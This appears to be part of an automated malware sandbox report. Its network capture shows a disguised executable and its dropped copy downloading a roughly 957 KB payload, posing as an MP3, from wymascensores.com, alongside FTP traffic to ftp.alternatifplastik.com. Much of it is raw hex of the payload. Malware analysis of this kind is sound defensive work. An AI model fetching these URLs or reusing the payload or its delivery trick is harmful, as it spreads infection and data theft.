                                        Oct 8, 2024 08:56:26.305048943 CEST4989762301192.168.2.95.2.84.236
                                        Oct 8, 2024 08:56:26.305124044 CEST4989762301192.168.2.95.2.84.236
                                        Oct 8, 2024 08:56:26.309926033 CEST62301498975.2.84.236192.168.2.9
                                        Oct 8, 2024 08:56:26.310273886 CEST62301498975.2.84.236192.168.2.9
                                        Oct 8, 2024 08:56:26.310353994 CEST4989762301192.168.2.95.2.84.236
                                        Oct 8, 2024 08:56:26.353482962 CEST4988321192.168.2.95.2.84.236
                                        Oct 8, 2024 08:56:26.567184925 CEST21498835.2.84.236192.168.2.9
                                        Oct 8, 2024 08:56:26.619110107 CEST4988321192.168.2.95.2.84.236
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 08:55:57.441870928 CEST5534453192.168.2.91.1.1.1
                                        Oct 8, 2024 08:55:57.684951067 CEST53553441.1.1.1192.168.2.9
                                        Oct 8, 2024 08:56:01.013789892 CEST5936053192.168.2.91.1.1.1
                                        Oct 8, 2024 08:56:01.235975981 CEST53593601.1.1.1192.168.2.9
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 8, 2024 08:55:57.441870928 CEST192.168.2.91.1.1.10x58d0Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                        Oct 8, 2024 08:56:01.013789892 CEST192.168.2.91.1.1.10xff1eStandard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 8, 2024 08:55:57.684951067 CEST1.1.1.1192.168.2.90x58d0No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                        Oct 8, 2024 08:56:01.235975981 CEST1.1.1.1192.168.2.90xff1eNo error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                        • wymascensores.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.94971767.212.175.1624437480C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 06:55:58 UTC82OUTGET /dfsd/Wulwtq.mp3 HTTP/1.1
                                        Host: wymascensores.com
                                        Connection: Keep-Alive
                                        2024-10-08 06:55:58 UTC209INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 06:55:57 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 957960
                                        Connection: close
                                        Content-Type: audio/mpeg
                                        2024-10-08 06:55:58 UTC7983INData Raw: 33 64 82 05 ab bb 17 50 bf 89 60 25 e5 94 f7 6e fb 7f 8d b0 c4 ed 6b 3d 39 fa 30 da 6b aa e6 ce 33 87 a2 d2 8d 35 f2 f3 29 a8 30 a1 b8 62 f3 69 90 4d c4 9f 7d 1b 2a ad 34 e1 42 fa a0 d0 79 c8 4f a8 a4 ac c0 ce 4b 47 85 e2 cc db 6a bc e8 54 22 36 67 ab ab cc 7d 1b 87 9d b8 4c 0f d0 42 a0 57 58 e3 b8 d7 78 30 34 78 62 84 72 9b 04 d3 26 85 3d be b1 1c ff 9d c5 31 08 a3 6a 9d 19 03 c8 0a 01 48 09 a5 21 c8 06 7a 52 71 a0 66 19 bf 03 ee 2d 6d 4b d9 dc 34 4c 4c 89 18 6d 62 eb ed c0 a6 e9 87 17 00 34 40 83 4c bd 3a 2c b4 ff be d6 a3 d2 e0 bc 49 97 dc 60 56 09 4d 96 36 9d e1 37 9d 6d 88 31 0f 57 be 62 ff 0a 39 fd 3e ec fc c0 65 ea a2 c3 59 d3 b4 b9 b3 5c aa 89 48 8d 53 cb a3 4a cb 61 36 31 51 48 6d 52 03 23 62 34 6c 00 e3 44 86 f2 8c b4 3f 38 67 e3 9d 6d e0 ca f2
                                        Data Ascii: 3dP`%nk=90k35)0biM}*4ByOKGjT"6g}LBWXx04xbr&=1jH!zRqf-mK4LLmb4@L:,I`VM67m1Wb9>eY\HSJa61QHmR#b4lD?8gm
                                        2024-10-08 06:55:58 UTC8000INData Raw: e3 82 11 ca 60 97 19 5e ce de 66 ed 70 dd 49 7d de 60 54 6f 33 5c 55 f8 c6 10 ff 4a 49 5c d7 5f 6e 14 4c b3 4b 9b 3d 3e fd 02 3e c6 7d 24 35 32 8c 26 98 c6 81 2e cf a9 ae 82 05 d7 da d1 cf 3f 8f 3e 4d 77 3a 46 17 f8 d6 e1 83 af eb 01 63 0b 86 67 80 fe 3d 06 3e 3f ad 1a 1c 29 ae 68 6c e5 f8 cd f3 55 fe a6 65 89 42 5c 7f 7c eb f9 c6 a9 65 d6 3c 50 cc bb 5e 2a fb 62 30 d2 68 89 62 12 f0 57 e8 71 0a 3a 17 16 97 ab 01 8d 5a 8c ae d0 e3 7c 90 32 3f fd a7 23 a8 43 47 dd bd 74 40 f8 7a 07 d6 a5 0c 43 3e 58 d5 17 20 5c ae f4 8d ad 99 4f b5 b6 f2 0a 17 6c 62 4f c9 fa fa 53 4a d2 eb 03 04 36 eb 36 21 f0 b0 7b df bb e2 d3 fb 14 14 09 2a 09 d8 a6 44 2a 8f 2b 65 64 9a 8f 4c 9e 34 da 6f e0 8d 9c 71 fc 89 b8 ab 3f 75 95 73 f3 6f 34 04 d7 7b fa 3d 6e 71 c0 9e 18 8d cb 82
                                        Data Ascii: `^fpI}`To3\UJI\_nLK=>>}$52&.?>Mw:Fcg=>?)hlUeB\|e<P^*b0hbWq:Z|2?#CGt@zC>X \OlbOSJ66!{*D*+edL4oq?uso4{=nq
                                        2024-10-08 06:55:58 UTC8000INData Raw: 08 a8 31 76 62 aa 00 22 2a 2f fa 82 d5 53 04 c9 bb 7b 5b a1 85 06 55 6b a9 99 0e 60 79 23 50 6d 8f bd d5 fd 37 12 a7 b1 1e e4 44 5a fe af 23 da 7f 88 29 df c5 98 8f f6 aa 58 89 52 ae c3 62 f6 e6 3d 21 c1 6a a9 45 7c 36 57 24 39 c6 78 02 96 33 2a 80 8e 1c 5e dc d9 89 9c b3 b6 e6 2b 35 d9 64 4d 70 9b a4 92 37 2e 0f b7 c6 1c 17 7e 8b b5 41 6d 7e 6b 68 08 0a 08 69 46 8c f3 a5 d1 88 4f d4 07 d6 7c 53 ed 16 41 98 71 f4 f7 4f d4 b8 be b3 66 09 48 2d 71 87 9d a1 40 a6 0a dd e0 2d 16 23 aa c3 c5 80 ea 58 0e 34 e1 da 50 89 b8 fe 0c 99 4a b7 71 65 93 90 92 31 c4 3d a4 a3 2c 04 2e a1 f3 cf 91 b9 52 e6 aa e6 84 0e 2a 99 ae 94 24 93 0c aa ca ef 91 b3 d6 46 ac f2 fc f1 4a 06 1c 1f 8d 26 f5 eb 66 f2 84 76 76 b9 41 79 ff cb f4 53 da 5a 42 09 8a 86 ba 4f 76 78 ba e1 00 eb
                                        Data Ascii: 1vb"*/S{[Uk`y#Pm7DZ#)XRb=!jE|6W$9x3*^+5dMp7.~Am~khiFO|SAqOfH-q@-#X4PJqe1=,.R*$FJ&fvvAySZBOvx
                                        2024-10-08 06:55:58 UTC8000INData Raw: fb 0f 9c a1 b5 3f ca 9a d9 2c 2e 79 73 40 b8 69 d0 e6 ac 30 90 2c 9b 28 59 9a ef 1a 4c e6 60 71 fa bc 00 70 63 90 90 55 08 22 4b 28 65 16 b7 f1 b8 92 14 aa 96 21 8c df 9b 17 e7 d3 7a a9 9c 4b a3 c9 60 e3 98 e6 8c 3b 01 ca 8b 94 c8 f0 b1 e6 fa 51 7d 85 8f c4 08 f6 d5 a3 4b ce 80 33 0d 26 7e 7f 05 d0 52 15 cc bb a4 03 ef f3 13 d8 78 82 b6 a7 3d be cf 21 8e c4 6a 7f 38 9a 28 8a 39 1c 2f bf 38 6b c6 35 e9 c7 59 e3 c5 dc 13 d8 f0 3b 27 7b 50 41 43 38 c0 ae 50 47 b6 51 7f c5 17 a4 fd 26 00 a5 16 48 d7 f9 34 24 17 77 e9 f6 a5 bf 99 6c 6d ce de 96 c5 be 74 53 32 6a d4 d1 bc 71 6c 2b 54 2d 69 59 93 41 db b5 08 da 15 96 96 7a 2c 85 f2 ad 30 72 dc 96 4c f9 a9 60 28 56 47 05 ae 6f af 1f 4e 27 ee 3c ee 48 6c 2f cf 59 59 5e bb 14 12 ef 40 db 47 ba 7d 40 c5 34 99 9a 8c
                                        Data Ascii: ?,.ys@i0,(YL`qpcU"K(e!zK`;Q}K3&~Rx=!j8(9/8k5Y;'{PAC8PGQ&H4$wlmtS2jql+T-iYAz,0rL`(VGoN'<Hl/YY^@G}@4
                                        2024-10-08 06:55:58 UTC8000INData Raw: 32 b6 28 f9 20 83 c7 24 14 17 7b e8 3c 6f 2e 9b 7c a5 dd 6e 9b 43 33 b2 98 10 1d a3 a4 7a 27 f5 da 80 aa 8a 04 8f bb 8c 44 46 26 c4 7b 3a a2 ce 5c fc 7c e6 ef 56 5a 68 f3 c0 2e ad fd b8 74 7c c4 32 ea 11 fe d1 22 24 94 98 30 0d e3 6b dd 74 b1 bc 76 d4 70 f9 f6 24 af 67 e0 4d f1 f7 c8 42 0f b2 da 3f 19 88 da a7 2a 0f 14 b2 3a 4d 1e 11 8c ec 1d 09 59 7b 10 e4 b9 90 72 64 26 68 da 40 e2 0a 80 c8 ff b2 23 cc 87 ff 81 08 f7 c5 ab f5 44 57 b2 f8 28 dc 40 e7 b0 6e d5 ab 78 64 8f 0c 11 a4 69 01 73 f2 fa 98 46 b9 32 15 42 8d 00 51 15 02 9a a8 5f 62 d6 a6 c2 e9 8e 49 08 e2 6d 64 5b 8e c7 b7 71 5e 33 f2 b8 34 2c e5 71 31 5a ec 15 2b 0f 2b 8a 55 ba a3 fc d0 af fa ee b1 eb 4c c7 f9 8e 68 29 22 53 13 5f ac b9 3f f4 1b f5 c5 75 da b2 92 6f f6 28 b8 ea bc d2 e1 41 d3 09
                                        Data Ascii: 2( ${<o.|nC3z'DF&{:\|VZh.t|2"$0ktvp$gMB?*:MY{rd&h@#DW(@nxdisF2BQ_bImd[q^34,q1Z++ULh)"S_?uo(A
                                        2024-10-08 06:55:58 UTC8000INData Raw: 6b fa 9d 66 d5 8e 26 09 d7 dd 43 d6 75 4b 07 fc 08 13 9f 30 62 bb 23 53 6e d6 2b d6 6e 08 33 45 53 88 73 4c 46 fe b4 d6 fa a1 cd 6a da bf 51 de 44 b3 77 f4 dd c1 33 0b c3 0f 5a ac ce b2 aa 01 3e 44 0b 63 0b 35 6d c5 96 5a 70 74 e3 c6 74 89 ee ef 9a ac 71 ed e3 65 8b 61 b9 e0 71 84 7f ec d4 4e 87 fa f1 eb d6 c1 07 09 b8 d6 33 94 3f 44 58 3b ac 30 2a 9d 16 cb 3e fd d8 a8 3e ac 64 a6 ea 1b a2 69 6d 1c 27 12 ef 90 83 e8 a6 bd 0a 88 be da 94 e7 89 be 6d 1b 08 ec ee 47 72 97 2d 11 d2 a7 7e b1 d3 23 c6 9f c5 3a df 5c 78 0a 88 31 b4 a1 ca c7 50 8d ce fc 33 cb 23 6c 5a 62 b2 1f 5f 90 86 6e 4a b6 66 43 1a 56 84 7c d3 3a 2e f4 a2 2c 57 66 b7 b3 c5 53 06 01 49 2a f4 27 08 d1 4b f5 80 c3 eb 51 60 e8 58 91 3e 11 0c 86 d0 27 d3 2d 86 42 eb d5 32 f6 4d 78 e4 2a e1 35 d0
                                        Data Ascii: kf&CuK0b#Sn+n3ESsLFjQDw3Z>Dc5mZpttqeaqN3?DX;0*>>dim'mGr-~#:\x1P3#lZb_nJfCV|:.,WfSI*'KQ`X>'-B2Mx*5
                                        2024-10-08 06:55:58 UTC8000INData Raw: a2 a4 20 fa c4 68 59 b1 bb df 0c 62 22 a3 e6 9d 94 1c 71 c9 cb 4b c2 fc d1 fd 8d 6c e7 28 1d 04 d3 48 69 75 f2 c7 8d 87 2b d1 f9 ef bb 34 ab f3 59 90 17 e0 f7 03 7e 76 ca 7b ac 9c a1 40 d7 04 1d de 97 dc 64 aa c9 cc c1 78 28 9c d5 94 e6 5d 40 f4 89 f4 dd 9c c0 35 ec ed 98 3b a2 af e2 21 7a d8 b7 bb 75 71 56 5c a2 72 c3 09 e9 3c d8 ca e1 35 34 a8 c9 95 a8 8e 28 e0 85 79 57 dc 96 67 c5 f4 15 95 3a fe c6 36 34 e0 64 2b 94 82 e3 55 31 4a da 09 56 4b 06 f7 c0 bf 71 5b b8 94 7c 19 bf 93 b0 de 87 00 24 b8 8d d6 15 8e f4 f0 eb 55 bf 8c 88 b2 c9 4d 96 82 51 87 16 82 b5 0f df d2 e2 51 23 da 55 e1 4d 13 c3 cd 35 7f 0a 26 aa 7b ec 2c a6 7f 60 f4 92 52 28 33 e9 cb 83 0a 06 27 78 b2 a7 f2 de 67 5c 5d e9 3a 58 f0 bf 32 32 5d 83 c4 ed dc 76 8f ad 40 d8 a2 0a 23 a1 1f ee
                                        Data Ascii: hYb"qKl(Hiu+4Y~v{@dx(]@5;!zuqV\r<54(yWg:64d+U1JVKq[|$UMQQ#UM5&{,`R(3'xg\]:X22]v@#
                                        2024-10-08 06:55:58 UTC8000INData Raw: a1 7f e2 d5 a6 4f 45 8c 87 cb 8d 31 2e f2 dd 17 a0 36 b4 d3 57 39 a5 50 d2 d5 bb ba 9b fe ed 39 d3 c8 9d 0e 08 60 bc 54 10 7a ca 67 61 c2 97 91 39 71 8f 5a e9 07 41 30 f1 ca fa 9d 0e d1 8b ec e6 78 6d e0 5a 8d 71 8e 3e 26 9e b4 c0 1f b6 f9 06 6a 25 f2 7c 27 96 c5 b5 bb ce 4f 5f a0 72 2b 90 90 59 55 f2 8a 03 df b7 6d b5 3b 1b 24 fb ab ae c8 00 e2 ef af 2d 6a dc 30 c5 50 1f bf ff 81 87 96 a9 b9 b8 b8 d2 c5 c9 b0 29 8a 16 92 34 d2 18 99 cc 1e 5e 25 23 dc 84 22 36 d9 f8 9a 3b 29 cc 7c ab eb 60 3c 4e 9b 65 32 3b 1a 52 c9 63 8a b2 08 4f 7d 85 e7 bb ab 89 14 a5 05 ee 5c 1a 14 81 74 3e 14 b4 08 da fb 56 6a 0a c1 ef 4e 94 04 7e f5 b1 8a e1 73 bd e5 26 2a 61 79 54 59 1d 85 c7 43 1e 4f 8b 70 f9 7d ed d3 76 ea e6 3f 00 4c dc 44 c1 70 3c 9d b8 40 e3 c0 24 11 f2 c4 b1
                                        Data Ascii: OE1.6W9P9`Tzga9qZA0xmZq>&j%|'O_r+YUm;$-j0P)4^%#"6;)|`<Ne2;RcO}\t>VjN~s&*ayTYCOp}v?LDp<@$
                                        2024-10-08 06:55:58 UTC8000INData Raw: 86 11 d0 30 a7 b3 57 b8 bc 3e f2 c3 6d 57 6a 03 4c 52 4e 92 4d 1c 92 26 8d 06 8d ae 50 b2 25 da 2b a9 01 f7 4c f4 47 28 65 4c 1d f2 8f ac c8 3a 09 fa ab 37 2f 8b 98 a9 f7 76 e2 fa b0 79 97 2c 51 c3 62 79 4a 0a d8 b2 de b8 8b 79 03 a5 13 bc bd 69 ce a3 74 d9 ad da 85 d7 b0 a8 e0 65 c3 50 ca fe 01 ef ee eb c3 70 40 e9 7b 4d 56 4f 8a 75 c1 e9 45 05 87 db c3 3c 92 2e ed d1 15 00 89 89 30 a6 80 c6 49 91 8a 1b 75 e0 34 51 6b 8a b8 33 66 56 fb 2e 26 0e 3b 06 69 78 69 ad bb 18 9d 09 96 86 62 b5 a9 6e 65 ff a7 dc 0f 9c ec a9 36 bd e4 21 69 be 30 86 f7 8f 9d 48 4f 73 57 4f 16 77 28 19 dd b2 db 1d fd 18 28 2e 22 03 6e 2f ec a2 e6 d1 66 97 9b 80 37 c7 bc 11 9c 4e f0 73 75 c9 b6 6b c4 34 19 0c b8 ff 76 24 61 4b 30 f7 72 69 2d c7 70 76 cc a7 e2 f0 8f 50 65 28 a6 6a 5a
                                        Data Ascii: 0W>mWjLRNM&P%+LG(eL:7/vy,QbyJyitePp@{MVOuE<.0Iu4Qk3fV.&;ixibne6!i0HOsWOw((."n/f7Nsuk4v$aK0ri-pvPe(jZ
                                        2024-10-08 06:55:58 UTC8000INData Raw: 22 63 0c 26 ed c8 67 c2 5c 7b c2 b3 5f 01 b1 9d d9 0c ca 88 ea 9f dc 3a 21 d2 06 31 e0 8e 79 a9 3c f4 47 c5 39 9d 9b 75 29 d0 73 a6 26 40 ab a6 bc 13 22 0f 70 cd 7f 37 7e b7 c2 c4 1f d2 04 41 b3 8e fe d7 fc 3b e4 61 43 02 0e 42 23 18 77 60 21 76 63 99 d4 d0 7d 5e 77 8d 96 12 f9 2d d6 0e 16 ce 14 b1 e7 92 66 c4 e3 f6 d8 39 2b 80 94 da f5 e0 a7 a5 ef 67 86 2a 2d 2b ca 7d 23 58 bd 04 f9 d0 15 e1 18 18 1f 36 3d 4a 0c 14 f2 6a 84 61 5c 61 45 9c 64 a6 fb a3 b0 ea 7a a5 0d cc 0d 0c ca 46 ab 63 40 fd 6c 8f af ce 9a 70 1f e1 67 c4 43 0b bb da f3 1d a5 78 85 aa 23 83 33 82 4c 95 65 71 82 71 c7 66 8e 81 6b 3a 12 c6 0f bd ad d5 97 64 81 f3 3a 84 06 0f 7e 36 9f dc b9 05 ed 7f 3b f0 c3 80 c3 78 19 84 25 fb 30 bd 60 44 9c 59 72 4f af 5d 87 c0 a2 d7 5b c5 9e be 9e a1 74
                                        Data Ascii: "c&g\{_:!1y<G9u)s&@"p7~A;aCB#w`!vc}^w-f9+g*-+}#X6=Jja\aEdzFc@lpgCx#3Leqqfk:d:~6;x%0`DYrO][t


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.94980067.212.175.1624437764C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 06:56:11 UTC82OUTGET /dfsd/Wulwtq.mp3 HTTP/1.1
                                        Host: wymascensores.com
                                        Connection: Keep-Alive
                                        2024-10-08 06:56:11 UTC209INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 06:56:10 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 957960
                                        Connection: close
                                        Content-Type: audio/mpeg
                                        2024-10-08 06:56:11 UTC7983INData Raw: 33 64 82 05 ab bb 17 50 bf 89 60 25 e5 94 f7 6e fb 7f 8d b0 c4 ed 6b 3d 39 fa 30 da 6b aa e6 ce 33 87 a2 d2 8d 35 f2 f3 29 a8 30 a1 b8 62 f3 69 90 4d c4 9f 7d 1b 2a ad 34 e1 42 fa a0 d0 79 c8 4f a8 a4 ac c0 ce 4b 47 85 e2 cc db 6a bc e8 54 22 36 67 ab ab cc 7d 1b 87 9d b8 4c 0f d0 42 a0 57 58 e3 b8 d7 78 30 34 78 62 84 72 9b 04 d3 26 85 3d be b1 1c ff 9d c5 31 08 a3 6a 9d 19 03 c8 0a 01 48 09 a5 21 c8 06 7a 52 71 a0 66 19 bf 03 ee 2d 6d 4b d9 dc 34 4c 4c 89 18 6d 62 eb ed c0 a6 e9 87 17 00 34 40 83 4c bd 3a 2c b4 ff be d6 a3 d2 e0 bc 49 97 dc 60 56 09 4d 96 36 9d e1 37 9d 6d 88 31 0f 57 be 62 ff 0a 39 fd 3e ec fc c0 65 ea a2 c3 59 d3 b4 b9 b3 5c aa 89 48 8d 53 cb a3 4a cb 61 36 31 51 48 6d 52 03 23 62 34 6c 00 e3 44 86 f2 8c b4 3f 38 67 e3 9d 6d e0 ca f2
                                        Data Ascii: 3dP`%nk=90k35)0biM}*4ByOKGjT"6g}LBWXx04xbr&=1jH!zRqf-mK4LLmb4@L:,I`VM67m1Wb9>eY\HSJa61QHmR#b4lD?8gm
                                        2024-10-08 06:56:11 UTC8000INData Raw: e3 82 11 ca 60 97 19 5e ce de 66 ed 70 dd 49 7d de 60 54 6f 33 5c 55 f8 c6 10 ff 4a 49 5c d7 5f 6e 14 4c b3 4b 9b 3d 3e fd 02 3e c6 7d 24 35 32 8c 26 98 c6 81 2e cf a9 ae 82 05 d7 da d1 cf 3f 8f 3e 4d 77 3a 46 17 f8 d6 e1 83 af eb 01 63 0b 86 67 80 fe 3d 06 3e 3f ad 1a 1c 29 ae 68 6c e5 f8 cd f3 55 fe a6 65 89 42 5c 7f 7c eb f9 c6 a9 65 d6 3c 50 cc bb 5e 2a fb 62 30 d2 68 89 62 12 f0 57 e8 71 0a 3a 17 16 97 ab 01 8d 5a 8c ae d0 e3 7c 90 32 3f fd a7 23 a8 43 47 dd bd 74 40 f8 7a 07 d6 a5 0c 43 3e 58 d5 17 20 5c ae f4 8d ad 99 4f b5 b6 f2 0a 17 6c 62 4f c9 fa fa 53 4a d2 eb 03 04 36 eb 36 21 f0 b0 7b df bb e2 d3 fb 14 14 09 2a 09 d8 a6 44 2a 8f 2b 65 64 9a 8f 4c 9e 34 da 6f e0 8d 9c 71 fc 89 b8 ab 3f 75 95 73 f3 6f 34 04 d7 7b fa 3d 6e 71 c0 9e 18 8d cb 82
                                        Data Ascii: `^fpI}`To3\UJI\_nLK=>>}$52&.?>Mw:Fcg=>?)hlUeB\|e<P^*b0hbWq:Z|2?#CGt@zC>X \OlbOSJ66!{*D*+edL4oq?uso4{=nq
                                        2024-10-08 06:56:11 UTC8000INData Raw: 08 a8 31 76 62 aa 00 22 2a 2f fa 82 d5 53 04 c9 bb 7b 5b a1 85 06 55 6b a9 99 0e 60 79 23 50 6d 8f bd d5 fd 37 12 a7 b1 1e e4 44 5a fe af 23 da 7f 88 29 df c5 98 8f f6 aa 58 89 52 ae c3 62 f6 e6 3d 21 c1 6a a9 45 7c 36 57 24 39 c6 78 02 96 33 2a 80 8e 1c 5e dc d9 89 9c b3 b6 e6 2b 35 d9 64 4d 70 9b a4 92 37 2e 0f b7 c6 1c 17 7e 8b b5 41 6d 7e 6b 68 08 0a 08 69 46 8c f3 a5 d1 88 4f d4 07 d6 7c 53 ed 16 41 98 71 f4 f7 4f d4 b8 be b3 66 09 48 2d 71 87 9d a1 40 a6 0a dd e0 2d 16 23 aa c3 c5 80 ea 58 0e 34 e1 da 50 89 b8 fe 0c 99 4a b7 71 65 93 90 92 31 c4 3d a4 a3 2c 04 2e a1 f3 cf 91 b9 52 e6 aa e6 84 0e 2a 99 ae 94 24 93 0c aa ca ef 91 b3 d6 46 ac f2 fc f1 4a 06 1c 1f 8d 26 f5 eb 66 f2 84 76 76 b9 41 79 ff cb f4 53 da 5a 42 09 8a 86 ba 4f 76 78 ba e1 00 eb
                                        Data Ascii: 1vb"*/S{[Uk`y#Pm7DZ#)XRb=!jE|6W$9x3*^+5dMp7.~Am~khiFO|SAqOfH-q@-#X4PJqe1=,.R*$FJ&fvvAySZBOvx
                                        2024-10-08 06:56:11 UTC8000INData Raw: fb 0f 9c a1 b5 3f ca 9a d9 2c 2e 79 73 40 b8 69 d0 e6 ac 30 90 2c 9b 28 59 9a ef 1a 4c e6 60 71 fa bc 00 70 63 90 90 55 08 22 4b 28 65 16 b7 f1 b8 92 14 aa 96 21 8c df 9b 17 e7 d3 7a a9 9c 4b a3 c9 60 e3 98 e6 8c 3b 01 ca 8b 94 c8 f0 b1 e6 fa 51 7d 85 8f c4 08 f6 d5 a3 4b ce 80 33 0d 26 7e 7f 05 d0 52 15 cc bb a4 03 ef f3 13 d8 78 82 b6 a7 3d be cf 21 8e c4 6a 7f 38 9a 28 8a 39 1c 2f bf 38 6b c6 35 e9 c7 59 e3 c5 dc 13 d8 f0 3b 27 7b 50 41 43 38 c0 ae 50 47 b6 51 7f c5 17 a4 fd 26 00 a5 16 48 d7 f9 34 24 17 77 e9 f6 a5 bf 99 6c 6d ce de 96 c5 be 74 53 32 6a d4 d1 bc 71 6c 2b 54 2d 69 59 93 41 db b5 08 da 15 96 96 7a 2c 85 f2 ad 30 72 dc 96 4c f9 a9 60 28 56 47 05 ae 6f af 1f 4e 27 ee 3c ee 48 6c 2f cf 59 59 5e bb 14 12 ef 40 db 47 ba 7d 40 c5 34 99 9a 8c
                                        Data Ascii: ?,.ys@i0,(YL`qpcU"K(e!zK`;Q}K3&~Rx=!j8(9/8k5Y;'{PAC8PGQ&H4$wlmtS2jql+T-iYAz,0rL`(VGoN'<Hl/YY^@G}@4
                                        2024-10-08 06:56:11 UTC8000INData Raw: 32 b6 28 f9 20 83 c7 24 14 17 7b e8 3c 6f 2e 9b 7c a5 dd 6e 9b 43 33 b2 98 10 1d a3 a4 7a 27 f5 da 80 aa 8a 04 8f bb 8c 44 46 26 c4 7b 3a a2 ce 5c fc 7c e6 ef 56 5a 68 f3 c0 2e ad fd b8 74 7c c4 32 ea 11 fe d1 22 24 94 98 30 0d e3 6b dd 74 b1 bc 76 d4 70 f9 f6 24 af 67 e0 4d f1 f7 c8 42 0f b2 da 3f 19 88 da a7 2a 0f 14 b2 3a 4d 1e 11 8c ec 1d 09 59 7b 10 e4 b9 90 72 64 26 68 da 40 e2 0a 80 c8 ff b2 23 cc 87 ff 81 08 f7 c5 ab f5 44 57 b2 f8 28 dc 40 e7 b0 6e d5 ab 78 64 8f 0c 11 a4 69 01 73 f2 fa 98 46 b9 32 15 42 8d 00 51 15 02 9a a8 5f 62 d6 a6 c2 e9 8e 49 08 e2 6d 64 5b 8e c7 b7 71 5e 33 f2 b8 34 2c e5 71 31 5a ec 15 2b 0f 2b 8a 55 ba a3 fc d0 af fa ee b1 eb 4c c7 f9 8e 68 29 22 53 13 5f ac b9 3f f4 1b f5 c5 75 da b2 92 6f f6 28 b8 ea bc d2 e1 41 d3 09
                                        Data Ascii: 2( ${<o.|nC3z'DF&{:\|VZh.t|2"$0ktvp$gMB?*:MY{rd&h@#DW(@nxdisF2BQ_bImd[q^34,q1Z++ULh)"S_?uo(A
                                        2024-10-08 06:56:11 UTC8000INData Raw: 6b fa 9d 66 d5 8e 26 09 d7 dd 43 d6 75 4b 07 fc 08 13 9f 30 62 bb 23 53 6e d6 2b d6 6e 08 33 45 53 88 73 4c 46 fe b4 d6 fa a1 cd 6a da bf 51 de 44 b3 77 f4 dd c1 33 0b c3 0f 5a ac ce b2 aa 01 3e 44 0b 63 0b 35 6d c5 96 5a 70 74 e3 c6 74 89 ee ef 9a ac 71 ed e3 65 8b 61 b9 e0 71 84 7f ec d4 4e 87 fa f1 eb d6 c1 07 09 b8 d6 33 94 3f 44 58 3b ac 30 2a 9d 16 cb 3e fd d8 a8 3e ac 64 a6 ea 1b a2 69 6d 1c 27 12 ef 90 83 e8 a6 bd 0a 88 be da 94 e7 89 be 6d 1b 08 ec ee 47 72 97 2d 11 d2 a7 7e b1 d3 23 c6 9f c5 3a df 5c 78 0a 88 31 b4 a1 ca c7 50 8d ce fc 33 cb 23 6c 5a 62 b2 1f 5f 90 86 6e 4a b6 66 43 1a 56 84 7c d3 3a 2e f4 a2 2c 57 66 b7 b3 c5 53 06 01 49 2a f4 27 08 d1 4b f5 80 c3 eb 51 60 e8 58 91 3e 11 0c 86 d0 27 d3 2d 86 42 eb d5 32 f6 4d 78 e4 2a e1 35 d0
                                        Data Ascii: kf&CuK0b#Sn+n3ESsLFjQDw3Z>Dc5mZpttqeaqN3?DX;0*>>dim'mGr-~#:\x1P3#lZb_nJfCV|:.,WfSI*'KQ`X>'-B2Mx*5
                                        2024-10-08 06:56:11 UTC8000INData Raw: a2 a4 20 fa c4 68 59 b1 bb df 0c 62 22 a3 e6 9d 94 1c 71 c9 cb 4b c2 fc d1 fd 8d 6c e7 28 1d 04 d3 48 69 75 f2 c7 8d 87 2b d1 f9 ef bb 34 ab f3 59 90 17 e0 f7 03 7e 76 ca 7b ac 9c a1 40 d7 04 1d de 97 dc 64 aa c9 cc c1 78 28 9c d5 94 e6 5d 40 f4 89 f4 dd 9c c0 35 ec ed 98 3b a2 af e2 21 7a d8 b7 bb 75 71 56 5c a2 72 c3 09 e9 3c d8 ca e1 35 34 a8 c9 95 a8 8e 28 e0 85 79 57 dc 96 67 c5 f4 15 95 3a fe c6 36 34 e0 64 2b 94 82 e3 55 31 4a da 09 56 4b 06 f7 c0 bf 71 5b b8 94 7c 19 bf 93 b0 de 87 00 24 b8 8d d6 15 8e f4 f0 eb 55 bf 8c 88 b2 c9 4d 96 82 51 87 16 82 b5 0f df d2 e2 51 23 da 55 e1 4d 13 c3 cd 35 7f 0a 26 aa 7b ec 2c a6 7f 60 f4 92 52 28 33 e9 cb 83 0a 06 27 78 b2 a7 f2 de 67 5c 5d e9 3a 58 f0 bf 32 32 5d 83 c4 ed dc 76 8f ad 40 d8 a2 0a 23 a1 1f ee
                                        Data Ascii: hYb"qKl(Hiu+4Y~v{@dx(]@5;!zuqV\r<54(yWg:64d+U1JVKq[|$UMQQ#UM5&{,`R(3'xg\]:X22]v@#
